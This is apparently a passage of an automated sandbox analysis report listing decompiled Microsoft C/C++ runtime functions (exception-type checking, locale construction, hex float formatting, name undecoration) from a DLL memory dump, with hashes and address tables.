0x6e1add26
0x6e1adcf7
0x6e1adcfa
0x6e1adcfc
0x00000000
0x00000000
0x6e1adcfe
0x6e1add01
0x6e1add0d
0x6e1add0d
0x6e1add0d
0x6e1add11
0x6e1add24
0x00000000
0x6e1add24
0x00000000
0x00000000
0x6e1adcab
0x6e1adca9
0x6e1adcc5

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 6E1ADD1D

Strings

csm, xrefs: 6E1ADCA3
MOC, xrefs: 6E1ADC9B
RCC, xrefs: 6E1ADC93

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: e574eeacf41f01285365a272efbce891a54fd1be54c553443da95ed904455d1e
Instruction ID: d6cd2e56d7290f5b65670e40c4fc8987a5fd61efd4d07598af792b39f8288751
Opcode Fuzzy Hash: e574eeacf41f01285365a272efbce891a54fd1be54c553443da95ed904455d1e
Instruction Fuzzy Hash: 2E1193395046099FD704DFD8D404BB9BBAAEF51729F61049ADA108B2A0D7B4EEC0EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E161D4A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E161D4A(void* __ebx, char __ecx, void* __edi, void* __esi, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _t61;
				void* _t65;
				char _t79;
				char _t94;
				intOrPtr _t95;
				signed int _t100;

				_t79 = __ecx;
				E6E1A9DBF(0x6e1e9573, __ebx, __edi, __esi, 4);
				_t94 = _t79;
				_v16 = _t94;
				E6E18F2A5(_t79, 0);
				_v4 = 0;
				 *((intOrPtr*)(_t94 + 4)) = 0;
				 *((char*)(_t94 + 8)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(_t94 + 0xc)) = 0;
				 *((char*)(_t94 + 0x10)) = 0;
				_v4 = 2;
				 *((intOrPtr*)(_t94 + 0x14)) = 0;
				 *((short*)(_t94 + 0x18)) = 0;
				_v4 = 3;
				 *((intOrPtr*)(_t94 + 0x1c)) = 0;
				 *((short*)(_t94 + 0x20)) = 0;
				_v4 = 4;
				 *((intOrPtr*)(_t94 + 0x24)) = 0;
				 *((char*)(_t94 + 0x28)) = 0;
				_v4 = 5;
				 *((intOrPtr*)(_t94 + 0x2c)) = 0;
				 *((char*)(_t94 + 0x30)) = 0;
				_v4 = 6;
				if(_a8 == 0) {
					E6E18F7BB(0, __edi, _t94, "bad locale name");
					asm("int3");
					_push(0xffffffff);
					_push(E6E1E95DF);
					_push( *[fs:0x0]);
					_push(_t79);
					_push(0);
					_push(_t94);
					_t61 =  *0x6e21801c; // 0x57d971a9
					_push(_t61 ^ _t100);
					 *[fs:0x0] =  &_v24;
					_t95 = _t79;
					_v28 = _t95;
					_v16 = 6;
					E6E19133E(_t79, _t95);
					_v16 = 5;
					if( *((intOrPtr*)(_t95 + 0x2c)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 0x2c)));
					}
					 *((intOrPtr*)(_t95 + 0x2c)) = 0;
					_v8 = 4;
					if( *((intOrPtr*)(_t95 + 0x24)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 0x24)));
					}
					 *((intOrPtr*)(_t95 + 0x24)) = 0;
					_v8 = 3;
					if( *((intOrPtr*)(_t95 + 0x1c)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 0x1c)));
					}
					 *((intOrPtr*)(_t95 + 0x1c)) = 0;
					_v8 = 2;
					if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 0x14)));
					}
					 *((intOrPtr*)(_t95 + 0x14)) = 0;
					_v8 = 1;
					if( *((intOrPtr*)(_t95 + 0xc)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 0xc)));
					}
					 *((intOrPtr*)(_t95 + 0xc)) = 0;
					_v8 = 0;
					if( *((intOrPtr*)(_t95 + 4)) != 0) {
						E6E1C136B( *((intOrPtr*)(_t95 + 4)));
					}
					 *((intOrPtr*)(_t95 + 4)) = 0;
					_v8 = _v8 | 0xffffffff;
					_t65 = E6E18F30C(_t95);
					 *[fs:0x0] = _v16;
					return _t65;
				} else {
					E6E1912F3(_t79, _t94, _a8);
					return E6E1A9D88(_t94, _v4 | 0xffffffff);
				}
			}

0x6e161d4a
0x6e161d51
0x6e161d56
0x6e161d58
0x6e161d5e
0x6e161d63
0x6e161d66
0x6e161d69
0x6e161d6c
0x6e161d70
0x6e161d73
0x6e161d76
0x6e161d7c
0x6e161d7f
0x6e161d83
0x6e161d87
0x6e161d8a
0x6e161d8e
0x6e161d92
0x6e161d95
0x6e161d98
0x6e161d9c
0x6e161d9f
0x6e161da2
0x6e161da9
0x6e161dc9
0x6e161dce
0x6e161dd2
0x6e161dd4
0x6e161ddf
0x6e161de0
0x6e161de1
0x6e161de2
0x6e161de3
0x6e161dea
0x6e161dee
0x6e161df4
0x6e161df6
0x6e161df9
0x6e161e01
0x6e161e07
0x6e161e0f
0x6e161e14
0x6e161e19
0x6e161e1c
0x6e161e1f
0x6e161e26
0x6e161e2b
0x6e161e30
0x6e161e31
0x6e161e34
0x6e161e3b
0x6e161e40
0x6e161e45
0x6e161e46
0x6e161e49
0x6e161e50
0x6e161e55
0x6e161e5a
0x6e161e5b
0x6e161e5e
0x6e161e65
0x6e161e6a
0x6e161e6f
0x6e161e70
0x6e161e73
0x6e161e79
0x6e161e7e
0x6e161e83
0x6e161e84
0x6e161e87
0x6e161e8d
0x6e161e95
0x6e161ea0
0x6e161dab
0x6e161daf
0x6e161dc1
0x6e161dc1

APIs

__EH_prolog3.LIBCMT ref: 6E161D51
std::_Lockit::_Lockit.LIBCPMT ref: 6E161D5E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E161DAF

Part of subcall function 6E1912F3: _Yarn.LIBCPMT ref: 6E191312
Part of subcall function 6E1912F3: _Yarn.LIBCPMT ref: 6E191336

Strings

bad locale name, xrefs: 6E161DC4

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: ab31198290ec0d6172d816beed9034adf578ec31e121243a8d0882ed8aee13af
Instruction ID: b64e1a6491130f0c4c962b18f8e3dc8af66c71529e07012a295c55168af3f63c
Opcode Fuzzy Hash: ab31198290ec0d6172d816beed9034adf578ec31e121243a8d0882ed8aee13af
Instruction Fuzzy Hash: 07118270805784DDD721CFBD814428EFEE47F29304F60899ED19997641C7709788EB59

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D203E, Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1D203E(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t195;

				_t195 = __fp0;
				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E1B5F9E( &_v60, _t167, _t195, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t169 = _t184 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t185 =  &(_t169[0]);
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E6E1E8AE0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E6E1E8AE0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t120 = _t185 - 1;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E6E1AD830(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E6E1E8AE0( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t172 = _t105 + 2;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E6E1E8B00();
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E6E1E8B00();
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E6E1E8B00();
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t181 = _t172 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E6E1D2357(_t135, _t141, _t195, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E6E1E8F50(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E6E1C23F4(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E6E1C22C2();
				goto L66;
			}

0x6e1d203e
0x6e1d203e
0x6e1d2049
0x6e1d204e
0x6e1d2050
0x6e1d2050
0x6e1d2054
0x6e1d205d
0x6e1d205f
0x6e1d2064
0x6e1d2067
0x6e1d206a
0x6e1d2080
0x6e1d2083
0x6e1d2088
0x6e1d2092
0x6e1d2097
0x6e1d20eb
0x6e1d20ed
0x6e1d20fc
0x6e1d20ff
0x6e1d2102
0x6e1d2104
0x6e1d210b
0x6e1d211d
0x6e1d2120
0x6e1d2125
0x6e1d2129
0x6e1d212a
0x6e1d214a
0x6e1d214d
0x6e1d214d
0x6e1d214d
0x6e1d214f
0x6e1d214f
0x6e1d2152
0x6e1d2155
0x6e1d2157
0x6e1d2168
0x6e1d2159
0x6e1d2159
0x6e1d2159
0x6e1d216a
0x6e1d216f
0x6e1d216f
0x6e1d2174
0x6e1d2177
0x6e1d2181
0x6e1d2183
0x6e1d2185
0x6e1d218a
0x6e1d218b
0x6e1d218e
0x6e1d2191
0x6e1d2194
0x6e1d2194
0x6e1d2196
0x00000000
0x00000000
0x6e1d21ad
0x6e1d21b4
0x6e1d21b8
0x6e1d21bb
0x6e1d21be
0x6e1d21c0
0x6e1d21c0
0x6e1d21c0
0x6e1d21c6
0x6e1d21c9
0x6e1d21cd
0x6e1d21cf
0x6e1d21d3
0x6e1d21d6
0x6e1d21d9
0x6e1d21da
0x6e1d21dd
0x6e1d21e0
0x6e1d21e3
0x6e1d21e3
0x6e1d21e8
0x6e1d21eb
0x6e1d21ee
0x00000000
0x00000000
0x6e1d2205
0x6e1d220a
0x6e1d220e
0x00000000
0x00000000
0x6e1d2212
0x6e1d2215
0x6e1d2216
0x6e1d2216
0x6e1d2218
0x6e1d221b
0x00000000
0x00000000
0x6e1d221d
0x6e1d2220
0x6e1d2227
0x6e1d222a
0x6e1d222d
0x6e1d2242
0x6e1d2242
0x6e1d2242
0x6e1d222f
0x6e1d222f
0x6e1d2232
0x6e1d223c
0x6e1d223c
0x6e1d2234
0x6e1d2237
0x6e1d2237
0x6e1d223e
0x6e1d223e
0x00000000
0x6e1d222d
0x6e1d2222
0x6e1d2222
0x6e1d2224
0x6e1d2224
0x6e1d2179
0x6e1d2179
0x6e1d217b
0x6e1d2245
0x6e1d2245
0x6e1d2247
0x6e1d2249
0x6e1d224c
0x6e1d224d
0x6e1d224e
0x6e1d224f
0x6e1d2257
0x6e1d2257
0x6e1d2259
0x6e1d2259
0x6e1d225c
0x6e1d225f
0x6e1d2262
0x6e1d2264
0x6e1d2266
0x6e1d2266
0x6e1d2273
0x6e1d227a
0x6e1d2281
0x6e1d2283
0x6e1d228c
0x6e1d228c
0x6e1d228f
0x6e1d2291
0x6e1d2294
0x6e1d2297
0x6e1d22a3
0x6e1d22a3
0x6e1d22a7
0x6e1d22aa
0x6e1d22ac
0x00000000
0x6e1d2299
0x6e1d2299
0x6e1d229f
0x6e1d229f
0x6e1d22ad
0x6e1d22ad
0x6e1d22b0
0x6e1d22b4
0x6e1d22b5
0x6e1d22b7
0x6e1d22b9
0x6e1d22bb
0x6e1d22e5
0x6e1d22e5
0x6e1d22e7
0x6e1d22f4
0x6e1d22f4
0x6e1d22f5
0x6e1d22f6
0x6e1d22f8
0x6e1d22fa
0x6e1d22ff
0x6e1d2301
0x6e1d2305
0x6e1d2308
0x6e1d230b
0x6e1d230d
0x6e1d230e
0x6e1d230e
0x6e1d2310
0x6e1d2310
0x6e1d2312
0x6e1d231f
0x6e1d231f
0x6e1d2320
0x6e1d2321
0x6e1d2323
0x6e1d2324
0x6e1d2325
0x6e1d232e
0x6e1d2331
0x6e1d2333
0x6e1d2334
0x6e1d2334
0x6e1d2336
0x6e1d2336
0x6e1d2336
0x6e1d2339
0x6e1d233b
0x6e1d233e
0x6e1d2340
0x6e1d2346
0x6e1d234b
0x6e1d234b
0x6e1d2356
0x6e1d2356
0x6e1d2314
0x6e1d2316
0x00000000
0x00000000
0x6e1d2318
0x00000000
0x00000000
0x6e1d231a
0x6e1d231d
0x00000000
0x00000000
0x00000000
0x6e1d231d
0x6e1d22e9
0x6e1d22eb
0x00000000
0x00000000
0x6e1d22ed
0x00000000
0x00000000
0x6e1d22ef
0x6e1d22f2
0x00000000
0x00000000
0x00000000
0x6e1d22f2
0x6e1d22bd
0x6e1d22c2
0x6e1d22c8
0x6e1d22c8
0x6e1d22c9
0x6e1d22ca
0x6e1d22cb
0x6e1d22cd
0x6e1d22d2
0x6e1d22d4
0x6e1d22d6
0x6e1d22db
0x6e1d22de
0x6e1d22e0
0x6e1d22e3
0x6e1d22e3
0x00000000
0x6e1d22e3
0x6e1d22c4
0x6e1d22c6
0x00000000
0x00000000
0x00000000
0x6e1d22c6
0x6e1d229b
0x6e1d229d
0x00000000
0x00000000
0x00000000
0x6e1d229d
0x6e1d2297
0x00000000
0x6e1d217b
0x6e1d2177
0x6e1d212c
0x6e1d2138
0x6e1d2138
0x6e1d213a
0x6e1d2141
0x00000000
0x6e1d2141
0x6e1d213c
0x00000000
0x6e1d213c
0x6e1d20ef
0x6e1d20f5
0x6e1d20f5
0x6e1d20f8
0x6e1d20f8
0x6e1d20f9
0x00000000
0x6e1d20f9
0x6e1d20f1
0x6e1d20f3
0x00000000
0x00000000
0x00000000
0x6e1d20f3
0x6e1d20b1
0x6e1d20b6
0x6e1d20b8
0x6e1d20c5
0x6e1d20cc
0x6e1d20ce
0x6e1d20d9
0x6e1d20d9
0x6e1d20dc
0x6e1d20de
0x6e1d20de
0x6e1d20e2
0x6e1d20ba
0x6e1d20ba
0x6e1d20ba
0x00000000
0x6e1d20b8
0x6e1d206c
0x6e1d2073
0x6e1d2074
0x6e1d2076
0x00000000

APIs

_strrchr.LIBCMT ref: 6E1D20C5

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 16a82699a1e575154b2b8751ee047934458732a382a13e0c7d27b13adf3e6678
Instruction ID: 88fd3d6d4414815b60b292489eef478ed5df7573c8b7f1b2611fdc5235143c48
Opcode Fuzzy Hash: 16a82699a1e575154b2b8751ee047934458732a382a13e0c7d27b13adf3e6678
Instruction Fuzzy Hash: FAB16B32A042469FDB01CFE8C8507EEBBF5EF5A340F248569E5649B340D7348986DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B36B9, Relevance: 6.2, APIs: 4, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1B36B9(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t68;
				signed int _t69;
				intOrPtr* _t71;
				signed int _t77;
				intOrPtr* _t79;
				signed int _t91;
				signed int _t92;
				signed int _t95;
				signed int _t98;
				void* _t105;
				char* _t111;
				char* _t116;
				char* _t119;
				intOrPtr* _t121;
				signed int* _t122;

				_t110 = __ebx;
				_t111 =  *0x6e221b68; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t60 =  *_t111;
				if(_t60 == 0) {
					L15:
					E6E1AFB49(_t111, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t63 = _t60 - 0x24;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t111 + 1));
					__eflags = _t64 - 0x24;
					if(_t64 == 0x24) {
						_t111 = _t111 + 2;
						 *0x6e221b68 = _t111;
						_t65 =  *_t111;
						__eflags = _t65 - 0x52;
						if(__eflags > 0) {
							_t66 = _t65 - 0x53;
							__eflags = _t66;
							if(_t66 == 0) {
								_t55 = _t111 + 1; // -1
								 *0x6e221b68 = _t55;
								L45:
								_t68 = _a4;
								 *((intOrPtr*)(_t68 + 4)) = 0;
								 *((char*)(_t68 + 4)) = 2;
								 *_t68 = 0;
								return _t68;
							}
							_t69 = _t66 - 1;
							__eflags = _t69;
							if(_t69 == 0) {
								_t45 = _t111 + 1; // -1
								 *0x6e221b68 = _t45;
								_t71 = _a8;
								__eflags =  *_t71;
								if( *_t71 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E6E1AF764(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E6E1AFAFC(_t111, _a4,  &_v20, _t71);
								goto L16;
							}
							_t77 = _t69;
							__eflags = _t77;
							if(_t77 == 0) {
								_t121 = _a8;
								_t41 = _t111 + 1; // -1
								 *0x6e221b68 = _t41;
								_t79 = _a4;
								 *_t79 =  *_t121;
								 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t121 + 4));
								return _t79;
							}
							__eflags = _t77 - 3;
							if(__eflags != 0) {
								goto L45;
							}
							_t39 = _t111 + 1; // -1
							 *0x6e221b68 = _t39;
							E6E1B40AC(0, __eflags, _a4);
							L6:
							goto L17;
						}
						_t122 = _a8;
						if(__eflags == 0) {
							_t116 =  &_v12;
							_push( &_v20);
							__eflags =  *_t122;
							if( *_t122 == 0) {
								_v20 = "volatile";
								_v16 = 8;
							} else {
								_v20 = "volatile ";
								_v16 = 9;
							}
							E6E1AFA1C(_t116);
							_t111 =  *0x6e221b68; // 0x0
							L34:
							_push(3);
							L12:
							_v20 =  *_t122;
							 *0x6e221b68 = _t111 + 1;
							_v16 =  *(_t122 + 4) | 0x00000100;
							_push( &_v20);
							_push( &_v12);
							_push(_a4);
							E6E1B3A75(_t110);
							goto L17;
						}
						_t91 = _t65;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L15;
						}
						_t92 = _t91 - 0x41;
						__eflags = _t92;
						if(_t92 == 0) {
							_t31 = _t111 + 1; // -1
							 *0x6e221b68 = _t31;
							E6E1B2A33(_a4, _t122);
							L5:
							goto L6;
						}
						_t95 = _t92 - 1;
						__eflags = _t95;
						if(_t95 == 0) {
							_t29 = _t111 + 1; // -1
							 *0x6e221b68 = _t29;
							E6E1B3908(__ebx, _t122, _a4, _t122, 1);
							goto L16;
						}
						_t98 = _t95 - 1;
						__eflags = _t98;
						if(_t98 == 0) {
							_t22 = _t111 + 1; // -1
							_v20 = 0;
							 *0x6e221b68 = _t22;
							_v16 = 0;
							E6E1B1229(_a4, E6E1B18EA(_t111,  &_v12, _t122, 0,  &_v20, 0));
							goto L17;
						}
						__eflags = _t98 == 0xe;
						if(_t98 == 0xe) {
							goto L34;
						}
						goto L45;
					}
					__eflags = _t64;
					if(_t64 != 0) {
						goto L45;
					}
					goto L15;
				}
				_t122 = _a8;
				_t105 = _t63 - 0x1d;
				if(_t105 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t105 == 1) {
					_t119 =  &_v12;
					_push( &_v20);
					__eflags =  *_t122;
					if( *_t122 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E6E1AFA1C(_t119);
					_t111 =  *0x6e221b68; // 0x0
					goto L11;
				}
				E6E1B1229(_a4, _t122);
				goto L5;
			}

0x6e1b36b9
0x6e1b36bf
0x6e1b36c8
0x6e1b36cb
0x6e1b36d1
0x6e1b36d3
0x6e1b376c
0x6e1b3774
0x6e1b3779
0x6e1b377c
0x00000000
0x6e1b377c
0x6e1b36d9
0x6e1b36dc
0x6e1b375d
0x6e1b3760
0x6e1b3762
0x6e1b3782
0x6e1b3785
0x6e1b378b
0x6e1b378e
0x6e1b3791
0x6e1b3852
0x6e1b3852
0x6e1b3855
0x6e1b38ef
0x6e1b38f2
0x6e1b38f7
0x6e1b38f7
0x6e1b38fa
0x6e1b38fd
0x6e1b3901
0x00000000
0x6e1b3901
0x6e1b385b
0x6e1b385b
0x6e1b385e
0x6e1b38a1
0x6e1b38a4
0x6e1b38a9
0x6e1b38ac
0x6e1b38ae
0x6e1b38d7
0x6e1b38de
0x6e1b38e5
0x00000000
0x6e1b38e5
0x6e1b38b4
0x6e1b38bf
0x6e1b38c6
0x00000000
0x6e1b38c6
0x6e1b3861
0x6e1b3861
0x6e1b3864
0x6e1b3884
0x6e1b3887
0x6e1b388a
0x6e1b388f
0x6e1b3894
0x6e1b3899
0x00000000
0x6e1b3899
